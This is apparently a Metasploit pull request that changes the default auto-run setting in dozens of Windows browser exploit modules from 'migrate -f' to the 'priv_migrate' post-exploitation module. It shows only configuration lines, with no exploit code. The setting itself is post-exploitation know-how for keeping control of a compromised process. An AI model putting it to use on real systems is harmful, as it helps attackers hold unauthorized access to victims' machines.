### PR TITLE
Fix #8002, Use post/windows/manage/priv_migrate instead of migrate -f

### DIFF
--- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'             => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/adobe_flash_avm2.rb
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Platform'       => 'win',

--- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false,
           'EXITFUNC'             => "thread"
         },

--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb
+++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb
+++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Platform'       => 'win',

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'             => 'process',
           'HTTP::compression'    => 'gzip',
           'HTTP::chunked'        => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'          => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'         => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC'          => 'process',
           'HTTP::compression' => 'gzip',
           'HTTP::chunked'     => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
+++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'      =>
         {
           'Retries'              => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'BrowserRequirements' =>
         {

--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'BrowserRequirements' =>

--- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "May 22 2013"

--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/aventail_epi_activex.rb
+++ b/modules/exploits/windows/browser/aventail_epi_activex.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'         => "none",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/clear_quest_cqole.rb
+++ b/modules/exploits/windows/browser/clear_quest_cqole.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
+++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -45,7 +45,7 @@ require 'msf/core'
           'DefaultOptions'  =>
           {
             'EXITFUNC' => "thread",
-            'InitialAutoRunScript' => 'migrate -f'
+            'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
           },
           'References'     =>
             [

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f -k'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
+++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
+++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'PrependMigrate'       => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Sep 17 2013",

--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/java_docbase_bof.rb
+++ b/modules/exploits/windows/browser/java_docbase_bof.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/java_mixer_sequencer.rb
+++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'             => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "none",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb
+++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
+++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb
+++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_nstreerange.rb
+++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread', # graceful exit if run in separate thread
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb
+++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
+++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => %w{ win },
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
